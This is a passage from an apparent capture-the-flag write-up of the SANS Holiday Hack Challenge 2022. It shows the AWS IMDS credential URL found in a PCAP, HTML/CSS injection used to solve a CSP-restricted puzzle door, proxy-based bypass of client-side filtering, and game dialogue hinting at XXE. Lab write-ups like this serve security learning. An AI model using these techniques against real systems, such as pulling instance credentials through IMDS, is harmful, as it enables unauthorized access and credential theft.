&lt;p&gt;Great! Just one more challenge! It looks like they made the server pull
credentials from IMDS. What URL was forced?&lt;/p&gt;
&lt;p&gt;AWS uses a specific IP address for IMDS lookups. Searching for that in the
PCAP should get you there quickly.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Alabaster is talking about the &lt;a class="reference external" href="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html"&gt;AWS metadata URL&lt;/a&gt;,
which is &lt;a class="reference external" href="http://169.254.169.254/latest/meta-data/"&gt;http://169.254.169.254/latest/meta-data/&lt;/a&gt;. Let's filter for HTTP traffic
to IP address &lt;code&gt;169.254.169.254&lt;/code&gt; in Wireshark, with the following filter:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;ip.addr == 169.254.169.254 &amp;amp;&amp;amp; http
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="The Wireshark's interface with the result of our filtering. We can see that the last request retrieves EC2 credentials." class="align-center" src="/images/sans-christmas-challenge-2022/pcap_metadata.png" /&gt;
&lt;p&gt;The last request returns EC2 credentials. The request URL was
&lt;a class="reference external" href="http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"&gt;http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;After answering the last question, Alabaster gives us some clues to solve the
puzzle that lies ahead:&lt;/p&gt;
&lt;img alt="Alabaster Snowball, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/alabastersnowball.png" /&gt;
&lt;p&gt;&lt;em&gt;Alabaster Snowball says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Fantastic! It seems simpler now that I've seen it once. Thanks for showing
me!&lt;/p&gt;
&lt;p&gt;Hey, so maybe I can help you out a bit with the door to the mines.&lt;/p&gt;
&lt;p&gt;First, it'd be great to bring an Elvish keyboard, but if you can't find
one, I'm sure other input will do.&lt;/p&gt;
&lt;p&gt;Instead, take a minute to read the HTML/JavaScript source and consider how
the locks are processed.&lt;/p&gt;
&lt;p&gt;Next, take a look at the Content-Security-Policy header. That drives how
certain content is handled.&lt;/p&gt;
&lt;p&gt;Lastly, remember that input sanitization might happen on either the client
or server ends!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div class="section" id="open-boria-mine-door"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id16"&gt;Open Boria Mine Door&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Before we can go on, we must open the door to the Boria Mine. Beside it stands
a Flobbit:&lt;/p&gt;
&lt;img alt="Hal Tandybuck is a Flobbit with light skin. He's wearing a red sweater with white loops, black pants and a green cape. He has hairy bare feet." class="align-center" src="/images/sans-christmas-challenge-2022/haltandybuck.png" /&gt;
&lt;p&gt;&lt;em&gt;Hal Tandybuck says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Oh hi, I'm Hal Tandybuck. And who might you be?&lt;/p&gt;
&lt;p&gt;I'm hanging out by the door to the mines here because, well, I haven't
figured out the locks yet.&lt;/p&gt;
&lt;p&gt;It actually reminds me of this locked crate I had three years ago...&lt;/p&gt;
&lt;p&gt;I doubt we'll get much in the way of debug output.&lt;/p&gt;
&lt;p&gt;Think you can help me get through?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let's take a look at this Boria Mine door:&lt;/p&gt;
&lt;img alt="The Boria Mine instructions, description below." class="align-center" src="/images/sans-christmas-challenge-2022/boria_mine_instructions.png" /&gt;
&lt;p&gt;So there are several cells on the door, and to open a cell, you must connect
the color sensors on each side by entering the correct charaters. It seems that
elvish script works best, but we don't have an elvish keybaord. Let's see our
cells:&lt;/p&gt;
&lt;img alt="The Boria Mine cells. There are six of them, connected with various color sensors. The first ones are white, then blue, then there are some cells with multiple color sensors (white and blue; red and blue; red, green, and blue). Sorry, it's a super graphic challenge. You can skip ahead." class="align-center" src="/images/sans-christmas-challenge-2022/boria_mine_cells.png" /&gt;
&lt;p&gt;Alright, I don't know if I solved this challenge in the intended way, but I
found a way that works:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;The &lt;code&gt;Content-Security-Policy&lt;/code&gt; of the first cell is pretty permisive.&lt;/li&gt;
&lt;li&gt;We can use the first cell to generate arbitrary HTML that will be rendered
as images.&lt;/li&gt;
&lt;li&gt;One can include images in every cell by submitting an &lt;code&gt;&amp;lt;img src=x&amp;gt;&lt;/code&gt;
tag. The catch is that the image must be hosted on the KringleCon domain
(because of the restrictions in the CSP header). What's more, cells #4 and
#5 have client-side filtering on the values we send. We can use an
intercepting proxy, such as Burp, to send any value we want.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;So, the idea is to use the first cell to generate arbitrary block of colors
using CSS and the Unicode character &lt;a class="reference external" href="https://www.fileformat.info/info/unicode/char/2588/index.htm"&gt;U+2588&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Here's how I solved each cells:&lt;/p&gt;
&lt;div class="section" id="cell-1"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id17"&gt;Cell 1&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;You can simply submit this HTML code to the first cell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt; &lt;span class="na"&gt;style&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;font-size:50px&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;████████████&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="cell-2"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id18"&gt;Cell 2&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;You can simply submit this HTML code to the second cell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt; &lt;span class="na"&gt;style&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;font-size:300px&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;████&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="cell-3"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id19"&gt;Cell 3&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;It gets tricky from here. First, you must generate the wanted image in the
first cell with this HTML code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt; &lt;span class="na"&gt;style&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;font-size:100px;color:blue&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;████████████&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This generates the following image:&lt;/p&gt;
&lt;img alt="A black square with a blue rectangle in the middle." class="align-center" src="/images/sans-christmas-challenge-2022/24398193ed2bb291da7235b12211d8d3d655f5fc.png" /&gt;
&lt;p&gt;You can send submit this HTML code to the third cell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;img&lt;/span&gt; &lt;span class="na"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/images/24398193ed2bb291da7235b12211d8d3d655f5fc.png&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;/&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="cell-4"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id20"&gt;Cell 4&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;You can submit this HTML code to the fourth cell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt; &lt;span class="na"&gt;style&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;font-size:50px&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;████████████&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt; &lt;span class="na"&gt;style&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;font-size:250px;color:blue&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;██████████████████████████████████████&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Remember to send the data via an intercepting proxy to bypass the client-side
filtering.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="cell-5"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id21"&gt;Cell 5&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;First, you must generate the wanted image in the first cell with this HTML
code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt; &lt;span class="na"&gt;style&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;font-size:40px;color:red&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;████████████████&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt; &lt;span class="na"&gt;style&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;font-size:90px;color:red;margin-top:-20px&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;█&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt; &lt;span class="na"&gt;style&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;font-size:60px;color:blue;margin-left:10px;margin-top:-10px&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;█████████&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt; &lt;span class="na"&gt;style&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;font-size:90px;color:blue;margin-left:150px;margin-top:-150px&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;█&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This generates the following image:&lt;/p&gt;
&lt;img alt="A black square with a red and a blue L-shapes." class="align-center" src="/images/sans-christmas-challenge-2022/10dc476eb50d6f2661877bf5eeb6726a88c27cc5.png" /&gt;
&lt;p&gt;You can send submit this HTML code to the fifth cell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;img&lt;/span&gt; &lt;span class="na"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/images/10dc476eb50d6f2661877bf5eeb6726a88c27cc5.png&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;/&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Remember to send the data via an intercepting proxy to bypass the client-side
filtering.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="cell-6"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id22"&gt;Cell 6&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;First, you must generate the wanted image in the first cell with this HTML
code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt; &lt;span class="na"&gt;style&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;font-size:40px;color:#00ff00&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;████████████&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt; &lt;span class="na"&gt;style&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;font-size:40px;color:red&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;████████&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt; &lt;span class="na"&gt;style&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;font-size:60px;color:red;margin-left:100px;margin-top:-55px&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;███&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt; &lt;span class="na"&gt;style&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;font-size:60px;color:blue;margin-top:-15px&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;█████████&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This generates the following image:&lt;/p&gt;
&lt;img alt="A black square with a green, a red, and a blue rectangles." class="align-center" src="/images/sans-christmas-challenge-2022/7e9a0ae3e494d40d2e4e0343e6dba9222e21afa1.png" /&gt;
&lt;p&gt;You can send submit this HTML code to the sixth cell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;img&lt;/span&gt; &lt;span class="na"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/images/7e9a0ae3e494d40d2e4e0343e6dba9222e21afa1.png&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;/&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here's the final result:&lt;/p&gt;
&lt;img alt="The Boria Mine cells are all unlocked." class="align-center" src="/images/sans-christmas-challenge-2022/boria_mine_solved.png" /&gt;
&lt;img alt="Hal Tandybuck, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/haltandybuck.png" /&gt;
&lt;p&gt;&lt;em&gt;Hal Tandybuck says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Great! Thanks so much for your help!&lt;/p&gt;
&lt;p&gt;When you get to the fountain inside, there are some things you should
consider.&lt;/p&gt;
&lt;p&gt;First, it might be helpful to focus on Glamtariel's CAPITALIZED words.&lt;/p&gt;
&lt;p&gt;If you finish those locks, I might just have another hint for you!&lt;/p&gt;
&lt;p&gt;Wha - what?? You opened all the locks?! Well then...&lt;/p&gt;
&lt;p&gt;Did you see the nearby terminal with evidence of an XXE attack?&lt;/p&gt;
&lt;p&gt;Maybe take a close look at that kind of thing.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="glamtariel-s-fountain"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id23"&gt;Glamtariel's Fountain&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;After opening the Boria Mine door, we get to the fountain, but a sporc is there
to meet us.&lt;/p&gt;
&lt;img alt="Akbowl is a sporc wearing a red toga, black snow shoes with white fur, a metal breastplate, and white fur on the shoulders." class="align-center" src="/images/sans-christmas-challenge-2022/akbowl.png" /&gt;
&lt;p&gt;&lt;em&gt;Akbowl says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Huh - what? Why do you disturb Akbowl?&lt;/p&gt;
&lt;p&gt;I'm trying to get the ring in here for the Sporc Chief.&lt;/p&gt;
&lt;p&gt;Unlucky for me it's lost in this water basin thing.&lt;/p&gt;
&lt;p&gt;You will &lt;em&gt;not&lt;/em&gt; get it out before Akbowl!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let's get the ring before him. To do so, we have to gaze into &lt;a class="reference external" href="https://glamtarielsfountain.com/"&gt;Glamtariel's
Galadriel fountain&lt;/a&gt;. We must find the
filename of the ring she presents to us.&lt;/p&gt;
&lt;p&gt;As usual, there's always one task during the Holiday Hack Challenge that I
spend waaaay too much time on. This year, it's the fountain. Let me explain
how it works:&lt;/p&gt;
&lt;img alt="The web interface of Glamtariel's fountain. We see Glamtariel, her fountain, and four small images of Santa, a candy cane, an ince cube, and an elf. Glamtariel tells us &amp;quot;Welcome to Glamtariel's Fountain! I see you have your entrance ticket so we've given you a snack, in case you get hungry. I can see there's a lot on your mind. Share these with us and enjoy your stay!&amp;quot;. The fountain says &amp;quot;I know there is something Glamtariel thinks about a lot but never discusses. Perhaps if you share things with her, she'd share with the both of us. I may be of some help also.&amp;quot;" class="align-center" src="/images/sans-christmas-challenge-2022/fountain_website.png" /&gt;
&lt;p&gt;Basically, we drag-and-drop images on Princess Glamtariel or on her fountain,
and they will give us information about them. I will give their answer for each
image:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;Santa:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on Glamtariel:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Glamtariel: &amp;quot;I don't know why anyone would ever ask me to &lt;strong&gt;TAMPER&lt;/strong&gt;
with the cookie recipe. I know just how Kringle likes them.&amp;quot;&lt;/li&gt;
&lt;li&gt;The fountain: &amp;quot;Glamtariel likes to keep Kringle happy so that he and
the elves will visit often.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on the fountain:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;The fountain: &amp;quot;Kringle really dislikes it if anyone tries to
&lt;strong&gt;TAMPER&lt;/strong&gt; with the cookie recipe Glamtariel uses.&amp;quot;&lt;/li&gt;
&lt;li&gt;Glamtariel: &amp;quot;Kringle really likes the cookies here so I always make
them the same way.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;The candy cane:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on Glamtariel:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Glamtariel: &amp;quot;Mmmmm, I love Kringlish Delight!&amp;quot;&lt;/li&gt;
&lt;li&gt;The fountain: &amp;quot;I think Glamtariel is thinking of a different story.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on the fountain:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;The fountain: &amp;quot;Zany Zonka makes the best of these!&amp;quot;&lt;/li&gt;
&lt;li&gt;Glamtariel: &amp;quot;I think fountain gets confused about things sometimes.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;The ice cube:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on Glamtariel:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Glamtariel: &amp;quot;No worries, it doesn't get nearly as cold here as it did
in Melgarexa. Brrrr, that was one frigid trip.&amp;quot;&lt;/li&gt;
&lt;li&gt;The fountain: &amp;quot;I think it's a perfect temperature here.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on the fountain:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;The fountain: &amp;quot;Hey, its Chilly Icycube, my old friend! I remember
when they were but a small drop in the Dimrofel.&amp;quot;&lt;/li&gt;
&lt;li&gt;Glamtariel: &amp;quot;It's always great when old friends visit!&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;The elf:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on Glamtariel:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Glamtariel: &amp;quot;I helped the elves to create the &lt;strong&gt;PATH&lt;/strong&gt; here to make
sure that only those invited can find their way here.&amp;quot;&lt;/li&gt;
&lt;li&gt;The fountain: &amp;quot;I wish the elves visited more often.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on the fountain:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;The fountain: &amp;quot;The elves do a great job making &lt;strong&gt;PATH&lt;/strong&gt; s which are easy
to follow once you see them.&amp;quot;&lt;/li&gt;
&lt;li&gt;Glamtariel: &amp;quot;I don't get away as much as I used to. I think I have
one last trip in me which I've probably put off for far too long.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;When we've asked about every element, the four images change:&lt;/p&gt;
&lt;img alt="The web interface of Glamtariel's fountain. We see Glamtariel, her fountain, and four small images of a ring, an igloo, a sailing ship, and a five-pointed star." class="align-center" src="/images/sans-christmas-challenge-2022/fountain_website_2.png" /&gt;
&lt;p&gt;Here's what we get when we drop them:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;The ring:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on Glamtariel:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Glamtariel: &amp;quot;I do have a small ring collection, including one of
these.&amp;quot;&lt;/li&gt;
&lt;li&gt;The fountain: &amp;quot;I think Glamtariel likes rings a little more than she
lets on sometimes.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on the fountain (an evil eye appears, we must click on it to make it go away):&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;The fountain: &amp;quot;Between Glamtariel and Kringle, many who have tried to
find the &lt;strong&gt;PATH&lt;/strong&gt; here uninvited have ended up very dis &lt;strong&gt;APP&lt;/strong&gt; ointed.
Please click away that ominous eye!&amp;quot;&lt;/li&gt;
&lt;li&gt;Glamtariel: &amp;quot;Careful with the fountain! I know what you were
wondering about there. It's no cause for concern. The &lt;strong&gt;PATH&lt;/strong&gt; here
is closed!&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;The igloo:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on Glamtariel:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Glamtariel: &amp;quot;It's understandable to wonder about home when one is
adventuring.&amp;quot;&lt;/li&gt;
&lt;li&gt;The fountain: &amp;quot;I think I'd worry too much if I ever left this place.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on the fountain:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;The fountain: &amp;quot;What's this? Fake tickets to get in here? Snacks that
don't taste right? How could that be?&amp;quot;&lt;/li&gt;
&lt;li&gt;Glamtariel: &amp;quot;The fountain shows many things, some more helpful than
others. It can definitely be a poor guide for decisions sometimes.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;The sailing ship:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on Glamtariel:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Glamtariel: &amp;quot;These ice boat things would have been helpful back in
the day. I still remember when Boregoth stole the Milsarils, very sad
times.&amp;quot;&lt;/li&gt;
&lt;li&gt;The fountain: &amp;quot;I'm glad I wasn't around for any of the early age
scuffles. I shudder just thinking about the stories.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
